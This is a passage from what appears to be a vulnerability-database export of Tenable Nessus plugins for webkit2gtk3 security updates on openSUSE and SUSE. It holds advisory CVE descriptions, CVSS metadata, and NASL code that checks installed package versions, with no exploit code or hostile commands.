of\n service (memory corruption and application crash) via a\n crafted website (bsc#1088182).\n\n - CVE-2018-4113: An issue in the JavaScriptCore function\n in the 'WebKit' component allowed attackers to trigger\n an assertion failure by leveraging improper array\n indexing (bsc#1088182)\n\n - CVE-2018-4114: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1088182) \n\n - CVE-2018-4117: An unspecified issue allowed remote\n attackers to bypass the Same Origin Policy and obtain\n sensitive information via a crafted website\n (bsc#1088182, bsc#1102530).\n\n - CVE-2018-4118: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1088182) \n\n - CVE-2018-4119: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1088182) \n\n - CVE-2018-4120: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1088182).\n\n - CVE-2018-4121: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1092278).\n\n - CVE-2018-4122: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1088182).\n\n - CVE-2018-4125: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1088182).\n\n - CVE-2018-4127: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1088182).\n\n - CVE-2018-4128: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1088182).\n\n - CVE-2018-4129: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1088182).\n\n - CVE-2018-4146: An unspecified issue allowed attackers to\n cause a denial of service (memory corruption) via a\n crafted website (bsc#1088182).\n\n - CVE-2018-4161: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1088182).\n\n - CVE-2018-4162: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1088182).\n\n - CVE-2018-4163: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1088182).\n\n - CVE-2018-4165: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1088182).\n\n - CVE-2018-4190: An unspecified issue allowed remote\n attackers to obtain sensitive credential information\n that is transmitted during a CSS mask-image fetch\n (bsc#1097693)\n\n - CVE-2018-4199: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (buffer overflow and application crash) via a\n crafted website (bsc#1097693)\n\n - CVE-2018-4218: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website that triggers an @generatorState\n use-after-free (bsc#1097693)\n\n - CVE-2018-4222: An unspecified issue allowed remote\n attackers to execute arbitrary code via a crafted\n website that leverages a getWasmBufferFromValue\n out-of-bounds read during WebAssembly compilation\n (bsc#1097693) \n\n - CVE-2018-4232: An unspecified issue allowed remote\n attackers to overwrite cookies via a crafted website\n (bsc#1097693) \n\n - CVE-2018-4233: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1097693) \n\n - CVE-2018-4246: An unspecified issue allowed remote\n attackers to execute arbitrary code via a crafted\n website that leverages type confusion (bsc#1104169) \n\n - CVE-2018-11646: webkitFaviconDatabaseSetIconForPageURL\n and webkitFaviconDatabaseSetIconURLForPageURL mishandled\n an unset pageURL, leading to an application crash\n (bsc#1095611)\n\n - CVE-2018-4133: A Safari cross-site scripting (XSS)\n vulnerability allowed remote attackers to inject\n arbitrary web script or HTML via a crafted URL\n (bsc#1088182).\n\n - CVE-2018-11713: The libsoup network backend of WebKit\n unexpectedly failed to use system proxy settings for\n WebSocket connections. As a result, users could be\n deanonymized by crafted websites via a WebSocket\n connection (bsc#1096060).\n\n - CVE-2018-11712: The libsoup network backend of WebKit\n failed to perform TLS certificate verification for\n WebSocket connections (bsc#1096061).\n\nThis update for webkit2gtk3 fixes the following issues :\n\n - Fixed a crash when atk_object_ref_state_set is called on\n an AtkObject that's being destroyed (bsc#1088932).\n\n - Fixed crash when using Wayland with QXL/virtio\n (bsc#1079512)\n\n - Disable Gigacage if mmap fails to allocate in Linux.\n\n - Add user agent quirk for paypal website.\n\n - Properly detect compiler flags, needed libs, and\n fallbacks for usage of 64-bit atomic operations.\n\n - Fix a network process crash when trying to get cookies\n of about:blank page.\n\n - Fix UI process crash when closing the window under\n Wayland.\n\n - Fix several crashes and rendering issues.\n\n - Do TLS error checking on\n GTlsConnection::accept-certificate to finish the load\n earlier in case of errors.\n\n - Properly close the connection to the nested wayland\n compositor in the Web Process.\n\n - Avoid painting backing stores for zero-opacity layers.\n\n - Fix downloads started by context menu failing in some\n websites due to missing user agent HTTP header.\n\n - Fix video unpause when GStreamerGL is disabled.\n\n - Fix several GObject introspection annotations.\n\n - Update user agent quiks to fix Outlook.com and\n Chase.com.\n\n - Fix several crashes and rendering issues.\n\n - Improve error message when Gigacage cannot allocate\n virtual memory.\n\n - Add missing WebKitWebProcessEnumTypes.h to\n webkit-web-extension.h.\n\n - Improve web process memory monitor thresholds.\n\n - Fix a web process crash when the web view is created and\n destroyed quickly.\n\n - Fix a network process crash when load is cancelled while\n searching for stored HTTP auth credentials.\n\n - Fix the build when ENABLE_VIDEO, ENABLE_WEB_AUDIO and\n ENABLE_XSLT are disabled.\n\n - New API to retrieve and delete cookies with\n WebKitCookieManager.\n\n - New web process API to detect when form is submitted via\n JavaScript.\n\n - Several improvements and fixes in the touch/gestures\n support.\n\n - Support for the &ldquo;system&rdquo; CSS font family.\n\n - Complex text rendering improvements and fixes.\n\n - More complete and spec compliant WebDriver\n implementation.\n\n - Ensure DNS prefetching cannot be re-enabled if disabled\n by settings.\n\n - Fix seek sometimes not working.\n\n - Fix rendering of emojis that were using the wrong scale\n factor in some cases.\n\n - Fix rendering of combining enclosed keycap.\n\n - Fix rendering scale of some layers in HiDPI.\n\n - Fix a crash in Wayland when closing the web view.\n\n - Fix crashes upower crashes when running inside a chroot\n or on systems with broken dbus/upower.\n\n - Fix memory leaks in GStreamer media backend when using\n GStreamer 1.14.\n\n - Fix several crashes and rendering issues.\n\n - Add ENABLE_ADDRESS_SANITIZER to make it easier to build\n with asan support.\n\n - Fix a crash a under Wayland when using mesa software\n rasterization.\n\n - Make fullscreen video work again.\n\n - Fix handling of missing GStreamer elements.\n\n - Fix rendering when webm video is played twice.\n\n - Fix kinetic scrolling sometimes jumping around.\n\n - Fix build with ICU configured without collation support.\n\n - WebSockets use system proxy settings now (requires\n libsoup 2.61.90).\n\n - Show the context menu on long-press gesture.\n\n - Add support for Shift + mouse scroll to scroll\n horizontally.\n\n - Fix zoom gesture to actually zoom instead of changing\n the page scale.\n\n - Implement support for Graphics ARIA roles.\n\n - Make sleep inhibitors work under Flatpak.\n\n - Add get element CSS value command to WebDriver.\n\n - Fix a crash aftter a swipe gesture.\n\n - Fix several crashes and rendering issues.\n\n - Fix crashes due to duplicated symbols in\n libjavascriptcoregtk and libwebkit2gtk.\n\n - Fix parsing of timeout values in WebDriver.\n\n - Implement get timeouts command in WebDriver.\n\n - Fix deadlock in GStreamer video sink during shutdown\n when accelerated compositing is disabled.\n\n - Fix several crashes and rendering issues.\n\n - Add web process API to detect when form is submitted via\n JavaScript.\n\n - Add new API to replace\n webkit_form_submission_request_get_text_fields() that is\n now deprecated.\n\n - Add WebKitWebView::web-process-terminated signal and\n deprecate web-process-crashed.\n\n - Fix rendering issues when editing text areas.\n\n - Use FastMalloc based GstAllocator for GStreamer.\n\n - Fix web process crash at startup in bmalloc.\n\n - Fix several memory leaks in GStreamer media backend.\n\n - WebKitWebDriver process no longer links to\n libjavascriptcoregtk.\n\n - Fix several crashes and rendering issues.\n\n - Add new API to add, retrieve and delete cookies via\n WebKitCookieManager.\n\n - Add functions to WebSettings to convert font sizes\n between points and pixels.\n\n - Ensure cookie operations take effect when they happen\n before a web process has been spawned.\n\n - Automatically adjust font size when\n GtkSettings:gtk-xft-dpi changes.\n\n - Add initial resource load statistics support.\n\n - Add API to expose availability of certain editing\n commands in WebKitEditorState.\n\n - Add API to query whether a WebKitNavigationAction is a\n redirect or not.\n\n - Improve complex text rendering.\n\n - Add support for the 'system' CSS font family.\n\n - Disable USE_GSTREAMER_GL\n\nThis update was imported from the SUSE:SLE-12-SP2:Update update\nproject.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1075775\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1077535\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1079512\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1088182\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1088932\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1092278\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1092279\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1092280\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1095611\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1096060\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1096061\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1097693\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1101999\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1102530\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1104169\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected webkit2gtk3 packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Safari Proxy Object Type Confusion');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libjavascriptcoregtk-4_0-18\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libjavascriptcoregtk-4_0-18-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libjavascriptcoregtk-4_0-18-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libjavascriptcoregtk-4_0-18-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwebkit2gtk-4_0-37\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwebkit2gtk-4_0-37-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwebkit2gtk-4_0-37-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwebkit2gtk-4_0-37-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwebkit2gtk3-lang\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:typelib-1_0-JavaScriptCore-4_0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:typelib-1_0-WebKit2-4_0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:typelib-1_0-WebKit2WebExtension-4_0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit-jsc-4\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit-jsc-4-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit2gtk-4_0-injected-bundles\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit2gtk-4_0-injected-bundles-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit2gtk3-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit2gtk3-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit2gtk3-plugin-process-gtk2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit2gtk3-plugin-process-gtk2-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:42.3\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/10/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/10/26\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE42\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"42.3\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE42.3\", reference:\"libjavascriptcoregtk-4_0-18-2.20.3-11.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"libjavascriptcoregtk-4_0-18-debuginfo-2.20.3-11.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"libwebkit2gtk-4_0-37-2.20.3-11.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"libwebkit2gtk-4_0-37-debuginfo-2.20.3-11.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"libwebkit2gtk3-lang-2.20.3-11.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"typelib-1_0-JavaScriptCore-4_0-2.20.3-11.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"typelib-1_0-WebKit2-4_0-2.20.3-11.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"typelib-1_0-WebKit2WebExtension-4_0-2.20.3-11.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"webkit-jsc-4-2.20.3-11.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"webkit-jsc-4-debuginfo-2.20.3-11.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"webkit2gtk-4_0-injected-bundles-2.20.3-11.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"webkit2gtk-4_0-injected-bundles-debuginfo-2.20.3-11.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"webkit2gtk3-debugsource-2.20.3-11.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"webkit2gtk3-devel-2.20.3-11.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"webkit2gtk3-plugin-process-gtk2-2.20.3-11.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"webkit2gtk3-plugin-process-gtk2-debuginfo-2.20.3-11.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", cpu:\"x86_64\", reference:\"libjavascriptcoregtk-4_0-18-32bit-2.20.3-11.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", cpu:\"x86_64\", reference:\"libjavascriptcoregtk-4_0-18-debuginfo-32bit-2.20.3-11.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", cpu:\"x86_64\", reference:\"libwebkit2gtk-4_0-37-32bit-2.20.3-11.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", cpu:\"x86_64\", reference:\"libwebkit2gtk-4_0-37-debuginfo-32bit-2.20.3-11.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libjavascriptcoregtk-4_0-18 / libjavascriptcoregtk-4_0-18-32bit / etc\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:34:43", "description": "This update for webkit2gtk3 to version 2.18.0 fixes the following issues: These security issues were fixed :\n\n - CVE-2017-7039: An issue was fixed that allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website (bsc#1050469).\n\n - CVE-2017-7018: An issue was fixed that allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website (bsc#1050469).\n\n - CVE-2017-7030: An issue was fixed that allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website (bsc#1050469).\n\n - CVE-2017-7037: An issue was fixed that allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website (bsc#1050469).\n\n - CVE-2017-7034: An issue was fixed that allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website (bsc#1050469).\n\n - CVE-2017-7055: An issue was fixed that allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website (bsc#1050469).\n\n - CVE-2017-7056: An issue was fixed that allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website (bsc#1050469).\n\n - CVE-2017-7064: An issue was fixed that allowed remote attackers to bypass intended memory-read restrictions via a crafted app (bsc#1050469).\n\n - CVE-2017-7061: An issue was fixed that allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website (bsc#1050469).\n\n - CVE-2017-7048: An issue was fixed that allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website (bsc#1050469).\n\n - CVE-2017-7046: An issue was fixed that allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website (bsc#1050469).\n\n - CVE-2017-2538: An issue was fixed that allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website (bsc#1045460)\n\n - CVE-2017-2496: An issue was fixed that allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website.\n\n - CVE-2017-2539: An issue was fixed that allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website.\n\n - CVE-2017-2510: An issue was fixed that allowed remote attackers to conduct Universal XSS (UXSS) attacks via a crafted website that improperly interacts with pageshow events.\n\n - CVE-2017-2365: An issue was fixed that allowed remote attackers to bypass the Same Origin Policy and obtain sensitive information via a crafted website (bsc#1024749)\n\n - CVE-2017-2366: An issue was fixed that allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website (bsc#1024749)\n\n - CVE-2017-2373: An issue was fixed that allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website (bsc#1024749)\n\n - CVE-2017-2363: An issue was fixed that allowed remote attackers to bypass the Same Origin Policy and obtain sensitive information via a crafted website (bsc#1024749)\n\n - CVE-2017-2362: An issue was fixed that allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website (bsc#1024749)\n\n - CVE-2017-2350: An issue was fixed that allowed remote attackers to bypass the Same Origin Policy and obtain sensitive information via a crafted website (bsc#1024749)\n\n - CVE-2017-2350: An issue was fixed that allowed remote attackers to bypass the Same Origin Policy and obtain sensitive information via a crafted website (bsc#1024749)\n\n - CVE-2017-2354: An issue was fixed that allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website (bsc#1024749).\n\n - CVE-2017-2355: An issue was fixed that allowed remote attackers to execute arbitrary code or cause a denial of service (uninitialized memory access and application crash) via a crafted website (bsc#1024749)\n\n - CVE-2017-2356: An issue was fixed that allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website (bsc#1024749)\n\n - CVE-2017-2371: An issue was fixed that allowed remote attackers to launch popups via a crafted website (bsc#1024749)\n\n - CVE-2017-2364: An issue was fixed that allowed remote attackers to bypass the Same Origin Policy and obtain sensitive information via a crafted website (bsc#1024749)\n\n - CVE-2017-2369: An issue was fixed that allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website (bsc#1024749)\n\n - CVE-2016-7656: An issue was fixed that allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website (bsc#1020950)\n\n - CVE-2016-7635: An issue was fixed that allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website (bsc#1020950)\n\n - CVE-2016-7654: An issue was fixed that allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website (bsc#1020950)\n\n - CVE-2016-7639: An issue was fixed that allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website (bsc#1020950)\n\n - CVE-2016-7645: An issue was fixed that allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website (bsc#1020950)\n\n - CVE-2016-7652: An issue was fixed that allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website (bsc#1020950)\n\n - CVE-2016-7641: An issue was fixed that allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website (bsc#1020950)\n\n - CVE-2016-7632: An issue was fixed that allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website (bsc#1020950)\n\n - CVE-2016-7599: An issue was fixed that allowed remote attackers to bypass the Same Origin Policy and obtain sensitive information via a crafted website that used HTTP redirects (bsc#1020950)\n\n - CVE-2016-7592: An issue was fixed that allowed remote attackers to obtain sensitive information via crafted JavaScript prompts on a web site (bsc#1020950)\n\n - CVE-2016-7589: An issue was fixed that allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website (bsc#1020950)\n\n - CVE-2016-7623: An issue was fixed that allowed remote attackers to obtain sensitive information via a blob URL on a website (bsc#1020950)\n\n - CVE-2016-7586: An issue was fixed that allowed remote attackers to obtain sensitive information via a crafted website (bsc#1020950) For other non-security fixes please check the changelog.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2017-11-07T00:00:00", "type": "nessus", "title": "SUSE SLED12 / SLES12 Security Update : webkit2gtk3 (SUSE-SU-2017:2933-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-7586", "CVE-2016-7589", "CVE-2016-7592", "CVE-2016-7599", "CVE-2016-7623", "CVE-2016-7632", "CVE-2016-7635", "CVE-2016-7639", "CVE-2016-7641", "CVE-2016-7645", "CVE-2016-7652", "CVE-2016-7654", "CVE-2016-7656", "CVE-2017-2350", "CVE-2017-2354", "CVE-2017-2355", "CVE-2017-2356", "CVE-2017-2362", "CVE-2017-2363", "CVE-2017-2364", "CVE-2017-2365", "CVE-2017-2366", "CVE-2017-2369", "CVE-2017-2371", "CVE-2017-2373", "CVE-2017-2496", "CVE-2017-2510", "CVE-2017-2538", "CVE-2017-2539", "CVE-2017-7018", "CVE-2017-7030", "CVE-2017-7034", "CVE-2017-7037", "CVE-2017-7039", "CVE-2017-7046", "CVE-2017-7048", "CVE-2017-7055", "CVE-2017-7056", "CVE-2017-7061", "CVE-2017-7064"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:libjavascriptcoregtk-4_0", "p-cpe:/a:novell:suse_linux:libjavascriptcoregtk-4_0-18-debuginfo", "p-cpe:/a:novell:suse_linux:libwebkit2gtk-4_0", "p-cpe:/a:novell:suse_linux:libwebkit2gtk-4_0-37-debuginfo", "p-cpe:/a:novell:suse_linux:typelib-1_0-JavaScriptCore", "p-cpe:/a:novell:suse_linux:typelib-1_0-WebKit2", "p-cpe:/a:novell:suse_linux:webkit2gtk-4_0-injected-bundles", "p-cpe:/a:novell:suse_linux:webkit2gtk-4_0-injected-bundles-debuginfo", "p-cpe:/a:novell:suse_linux:webkit2gtk3-debugsource", "cpe:/o:novell:suse_linux:12"], "id": "SUSE_SU-2017-2933-1.NASL", "href": "https://www.tenable.com/plugins/nessus/104428", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2017:2933-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(104428);\n script_version(\"3.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2016-7586\", \"CVE-2016-7589\", \"CVE-2016-7592\", \"CVE-2016-7599\", \"CVE-2016-7623\", \"CVE-2016-7632\", \"CVE-2016-7635\", \"CVE-2016-7639\", \"CVE-2016-7641\", \"CVE-2016-7645\", \"CVE-2016-7652\", \"CVE-2016-7654\", \"CVE-2016-7656\", \"CVE-2017-2350\", \"CVE-2017-2354\", \"CVE-2017-2355\", \"CVE-2017-2356\", \"CVE-2017-2362\", \"CVE-2017-2363\", \"CVE-2017-2364\", \"CVE-2017-2365\", \"CVE-2017-2366\", \"CVE-2017-2369\", \"CVE-2017-2371\", \"CVE-2017-2373\", \"CVE-2017-2496\", \"CVE-2017-2510\", \"CVE-2017-2538\", \"CVE-2017-2539\", \"CVE-2017-7018\", \"CVE-2017-7030\", \"CVE-2017-7034\", \"CVE-2017-7037\", \"CVE-2017-7039\", \"CVE-2017-7046\", \"CVE-2017-7048\", \"CVE-2017-7055\", \"CVE-2017-7056\", \"CVE-2017-7061\", \"CVE-2017-7064\");\n\n script_name(english:\"SUSE SLED12 / SLES12 Security Update : webkit2gtk3 (SUSE-SU-2017:2933-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for webkit2gtk3 to version 2.18.0 fixes the following\nissues: These security issues were fixed :\n\n - CVE-2017-7039: An issue was fixed that allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1050469).\n\n - CVE-2017-7018: An issue was fixed that allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1050469).\n\n - CVE-2017-7030: An issue was fixed that allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1050469).\n\n - CVE-2017-7037: An issue was fixed that allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1050469).\n\n - CVE-2017-7034: An issue was fixed that allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1050469).\n\n - CVE-2017-7055: An 